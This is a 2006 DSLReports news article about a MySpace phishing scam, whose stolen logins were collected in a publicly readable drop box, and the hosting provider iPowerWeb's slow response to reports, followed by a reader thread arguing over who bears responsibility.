dslreports logo
site
spacer

spacer
 
   
spc
story category
MySpace Phish Met With Hosting Provider Apathy
What's the responsibility of hosting providers?
by Karl Bode 05:04PM Friday Nov 10 2006
Yesterday we reported on a widespread phishing attack on MySpace, in which personal profiles had their HTML gamed to entirely overlay the usual look and feel with what appeared to be a real MySpace login page. A valid page should be hosted at login.myspace.com, but since this one was at myspace.com, it would have fooled even most phishing experts. Users have been told to watch the URL, and we're sure many did. Oops.

When the user submitted the phake form, it passed the user's name and password to a login.php script hosted on a third-party website, which dumped the data into a file. The user was then rerouted to the standard MySpace login. Users would presumably believe they had simply mistyped their password and would try again, unaware that they had been conned.

The directory holding this accumulated booty was visible to anybody who looked into the HTML source, and the file containing the user information could be downloaded by anyone. These unfortunate victims were now in the public domain. It's common for phishing drop boxes to be located in hard-to-reach jurisdictions. Because this one was in the United States, there was hope that the matter could be resolved in short order.

A number of the users in our security forums attempted to contact the web host, iPowerWeb, in an attempt to get them to shut this site down. However, users were shocked to find that the provider had positively no interest in mitigating the damage of this phishing operation.

One of our resident security experts informs us they were told that since the phished site was hosted elsewhere, nothing could be done. The easily accessible treasure trove of user information was "just a file of names," users were told. "They would not even consider looking at the MySpace page in order to reach their own judgement," one security expert tells us. "They simply did not care."

Others resident phish-trackers got the same response from iPowerWeb and were told there simply wasn't ample evidence this was even a phish. Users pointed out that the login.php script clearly involved the MySpace login page, and that the purported website fashion-infos.com had no obvious connection to MySpace. None of this information had any impact.

A long six hours later, the drop-box site was finally removed. We're unsure what triggered the hosting provider to finally take action, but we're curious about how many new users the phish grabbed during those six hours.

What's their responsibility?

In the early days of spam, providers would nuke accounts of those directly sending the offending emails, but some would refuse to do the same thing for accounts receiving emails in response. "The spam didn't touch our network, therefore there's nothing we can do," was a common refrain. The result was the category of "Spam Support Services".

These days, virtually all providers consider an account used for a spam drop box to be in the same category as one used to send the spam in the first place. Both are usually terminated, provided there is reasonable evidence.

Few of our resident experts believe that a provider should terminate an account based on an anonymous report from a non-customer. However, if a provider is tipped off, some digging should occur and a decision should be made based on the provider's reasonable judgement.

This scam was hardly a questionable case:
•the MySpace-hosted phishing pages clearly included the URL of iPowerWeb's customer site.•the directory containing the fake login.php script and the associated list of phished users was clearly visible to anybody who looked, including iPowerWeb.•the login.php script contained obvious references to MySpace's login pages.•the customer's site had no obvious connection to MySpace

Given the totality of the circumstances and the compiled evidence, several security analysts have told us it's hard to see how any competent administrator could possibly not arrive at the conclusion that this was a phish drop box.

iPowerWeb had a host of options available to it short of outright termination of the customer account on sight. Considering the presented evidence would have been a good start. From there they could have contacted the customer and asked pointed questions. They could have protected the drop-box location from indexing, so casual passers-by wouldn't be able to find the list of phished accounts. They could have also disabled and/or moved the drop-box directory while leaving the main site in place.

What responsibility does a hosting provider have to non-customers?

view:
topics flat nest 

Edrick
I aspire to tell the story of a lifetime
Premium
join:2004-09-11
Woburn, MA

Yea Good Job NOT

Yea ignore the fact that I reported this to them MONTHS ago and they did nothing at all. Great Job finally realize it months later.
--
Ricky SmithVerizon FIOS User15 Mbit Down 2 Mbit Up

ToxicDrew
Premium
join:2001-09-24

Re: Yea Good Job NOT

Tom needs to be held accountable for this!

FFH
Premium
join:2002-03-03
Tavistock NJ
kudos:5

Re: Yea Good Job NOT

said by ToxicDrew:

Tom needs to be held accountable for this!
Tom who?
--
--
My BLOG
My Web Page

percboy

join:2000-12-07
Columbus, OH

Re: Yea Good Job NOT

said by FFH:

said by ToxicDrew:

Tom needs to be held accountable for this!
Tom who?
»www.myspace.com/tom
mr_cool

join:2003-10-14
USA

Re: Yea Good Job NOT

You do realize that Tom is not a real person, just a image by the company that made mysapce?
buzzcut

join:2001-09-30
The woods

Re: Yea Good Job NOT

Huh? "Tom" is Tom Anderson, a founder of MySpace and real actual person.

SynErr
mIRC is my life

join:2006-09-14
Charleston, WV

Re: Yea Good Job NOT

tom is the guy that made MySpace.. but he doesn't do shit with it anymore.
--
myspace.com/acethebunny =]
eowen
Premium
join:2004-05-12
Temecula, CA

1 edit

great!

thats just great! now that gives me a totally good reason to dump it after several cases of errors from the site.

visiting the site at evening hours is insanely problematic but it was by choice. This time its my choice again :0

texans20
Premium
join:2002-09-28
Texas!

Myspace's problem

Myspace has not done enough to protect the security of their own network or site. Spam is rampant, and phishing has always been a problem. Some changes to what is allowed on a profile should be the first step. Removing php or any other script from being allowed to sit on a profile should be the first step.

It's not the hosting providor's fault myspace is lacking in some security.
buzzcut

join:2001-09-30
The woods

Re: Myspace's problem

I don't think anybody blames the hosting provider for somebody else's security problem, but when they are found to be abetting in that activity, aren't there any good-citizen obligations to help mitigate the damage?

Sebastian
Premium
join:2000-12-22
New Haven, CT
no one is at fault except for myspace.. clearly they should keep an eye on what the hell people are embedding into the pages they create.

Unregistered User

@comcast.net

1 recommendation

Re: Myspace's problem

I have to disagree. Yes, MySpace bears some responsibility, but the hosting provider where the phished information ends up has a responsibility to act when they are advised of what's going on.

A close but not perfect analogy would be if stolen goods were showing up in a pawn shop. Even if the pawn shop owner really didn't know the items were stolen when the thief began pawning them, as soon as he's shown that they are indeed stolen, he can not plead ignorance or maintain that he has no responsibility to do anything to assist in catching the thief.

To return to the MySpace situation, the Web hosting company owners also need to realize that, if this incident prompts a criminal investigation, they could be charged with aiding and abetting the perpetrators of the crime. It's one thing if they didn't know what was going on, but as soon as they're told, they can't just ignore what's happening. If they're smart, they'd better be preserving as much evidence as they can and contacting an attorney because if this does get investigated, they're the first people the police will come to.
amungus
Premium
join:2004-11-26
America
Reviews:
·Cox HSI
·KCH Cable

the game

Seems like quite a game to be playing... This should be an obvious open and shut case to anyone.

There are problems with myspace too though. They could very easily implement some simple things to increase their own security. For instance, I can stay logged in all day, it never times out. My bandmate can login, while I'm on, from anywhere, and it doesn't boot me, I just never know he was even logged in.

The myspace people should take some serious actions to reduce their own (security) issues as a matter of prudence. The whole system seems so incredibly duct-taped together that it's a miracle the thing works at all. Let alone, as others have said, the scripting.

While I agree they have security issues galore, the hosting provider in this case should be seriously accountable for allowing a phishing operation right under their noses, and not doing anything to stop it.
I think they should be seriously looked into by whatever authority.

firephoto
We the people
Premium
join:2003-03-18
Brewster, WA

near 40,000 emails/passwords from one of many phish scams

I count about 40,000 email addresses and passwords, not accounting for duplicate logins, from the two .txt files before the current one started growing rapidly till it stopped at about 1860M.
--
Location: +48° 5' 23.40", -119° 48' 30.00"
Insder
There never was a second I in my name
Premium
join:2005-04-27
Salem, MA

1 edit

Try dealing with ISPs on a daily basis

I've given up notifying US ISPs that customers on their networks are spewing phish spam/hosting phish pages. I generally get the same response from them that you guys got from IPowerWeb.
--
The one, the only, the Insder. :: Fighting phishing for life.

JAAulde
Web Developer
Premium,MVM
join:2001-05-09
Williamsport, MD
kudos:3

Previous CUstomer

As a previous customer of iPowerWeb, this does not come as a surprise. Thankfully that contract has ended and I moved on.

batterup
I Can Not Tell A Lie.
Premium
join:2003-02-06
Netcong, NJ

It serves them right.

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.

Jameson
Premium
join:2004-05-28
Fallbrook, CA
kudos:1

Re: It serves them right.

said by batterup:

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.
Obviously you don't know what your talking about.
--
DirecWay | DW6000-CE |SM5, 117 West, 970 MHz |3.2GHZ Intel|BFG GF 6800 OC |Win XP Pro SP2/98SE/ Macbook Pro OSX Tiger |PCs connected via Linksys WRT54G | DD-WRT firmware: dd-wrt.v23 SP1

batterup
I Can Not Tell A Lie.
Premium
join:2003-02-06
Netcong, NJ

Re: It serves them right.

said by Jameson:

said by batterup:

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.
Obviously you don't know what your talking about.
And you are talking to me. Fool.

ReVeLaTeD
Premium
join:2001-11-10
San Diego, CA
said by Jameson:

said by batterup:

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.
Obviously you don't know what your talking about.
Obviously you don't read the news. Or browse enough MySpace profiles. If you did either, you'd know that what he said is 100% accurate. I really get sick of almost daily news articles about some underage girl being visited by a 40+ year old man that she met on MySpace. And I'm sure you remember that incident of that celebrity's daughter (who was underage) whose MySpace profile was talking about all the various ways she liked to have sex. Get your facts straight.

On the topic. Clearly people must not care about their information being stolen because they always keep giving it even though the site is a virtual cesspool. However, that doesn't give MySpace a free pass to ignore the problem. I don't think the hosting company is to blame here. I think MySpace needs to be more aware and active in preventing issues like this as well as other non-technical issues (the "social engineering", if you will).

Snowy
Premium
join:2003-04-05
Kailua, HI
kudos:6
That's what got it shut down.
When a few 50 yr old iPowerWeb executives heard their MySpace login credentials got compromised they shut it down ASAP!
MGD
Premium,MVM
join:2002-07-31
kudos:9

Amazing !!

Wow!! there are the totally clueless, and then there is iPowerWeb. Clearly, the failure to respond reasonably to what was obviously a phishing support site on their IP space was gross negligence.

Even without reviewing the myspace page source code you would think that almost three quarters of a million email addresses with corresponding passwords stored in open files on their servers would generate some level of concern on iPowerWeb's part. Amazing !!

44402812
Hack The Planet
Premium
join:2006-08-28
Plattsburgh, NY

Re: Amazing !!

said by MGD:

Wow!! there are the totally clueless, and then there is iPowerWeb. Clearly, the failure to respond reasonably to what was obviously a phishing support site on their IP space was gross negligence.

Even without reviewing the myspace page source code you would think that almost three quarters of a million email addresses with corresponding passwords stored in open files on their servers would generate some level of concern on iPowerWeb's part. Amazing !!
Who Cares!!! :P MySpace Sucks and is a complete waste of energy!

Steve
I know your IP address
Consultant
join:2001-03-10
Yorba Linda, CA
kudos:5

Re: Amazing !!

said by 44402812:

Who Cares!!! :P MySpace Sucks and is a complete waste of energy!
More than a hundred million people disagree with you.

This might give some insight into who's actually right or not.

battleop

join:2005-09-28
00000

Re: Amazing !!

MySpace is the current geocities. Nothing pages that make my eyes hurt to look at.

Unregistered User

@comcast.net
Whether or not MySpace sucks is irrelevant. This is an identity theft issue, and if the hosting company won't address something like this, then one has to wonder what else they won't address.
kyrrin

join:2001-10-20
Kent, WA

iPowerweb is a spammer rathole

Honestly, I'm surprised iPowerweb did anything at all. Every spam report I've ever sent them has disappeared into Dave Null's inbox, never to be seen again (for the Unix beginners, and others who may not know, that's a playful reference to /dev/null, a built-in black hole present in any Unix-type system in that anything sent to it simply disappears).

I finally stopped bothering with reporting spammer crap to them, and firewalled their entire IP address range out of our network permanently. I would recommend that others who run their own networks do the same.

In short, they seem not to care who abuses their networks, or how much abuse goes from their networks to others, as long as they get their monthly fees.

In the SysAdmin world, we call that kind of behavior "black-hat" and "block-and-forget."

Keep the peace(es).
frammis

join:2005-05-05
San Jose, CA

Typical of lowball web hosts

Ipowerweb is just one of a gang of irresponsible web hosts. Their attitude is if they can get away with it, it's legal.

Nobody is going to put the CEO in jail for ignoring abuse complaints, so they put one minimum wage guy in charge of looking at the abuse@ queue if he has time after cleaning the toilets. And if he wants to remove a spammer support service he has to fill out a form in triplicate on his own time and the sales guy gets to tear it up and make him eat it. Alchemy and AIT are the same.

Face it, there would be no spam if there were no irresponsible ISPs. Cockroaches are simply nature's response to the ecological niche of slums with dirty kitchens. If there's a filthy slum, it's not the cockroaches' fault. Spammers are just cockroaches. Ipowerweb and Alchemy and AIT are the absentee slumlords who knowingly give them a happy home.
smoore69

join:2006-12-11
Bellevue, WA

Largest group on myspace w/ 200,000 users hacked and deleted

Today the LARGEST group on myspace with over 200,000 users was hacked and deleted. The group was:
»groups.myspace.com/wan
The group ID was: 100003506

The moderator got an email from this user right before it happened:

»profile.myspace.com/index.cfm?fu···34758226

Below is the correspondence from the user that he received. This is text from three emails.

Email 1: Subject: "Would you like your group to be featured on the front page of MySpace?"
Body: "Tom said he's working on it, you'll get it back once he added the new features
He took mine away too on another account and added this multiple moderator feature
because of the large groups thing "

Email 2: Subject: "YOU GOT OWNED MOTHA FUCKA!"
Body: "YOU GOT SERVED BITCH, SAY GOOD BYE TO YOUR GROUP "

Email 3: Subject: "FOWARDING MAIL AIN'T GO DO SHIT"
Body: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHH FUCKEN HA "

____________________________________________________

It seems the phishers are out to wreak havoc on myspace and its users.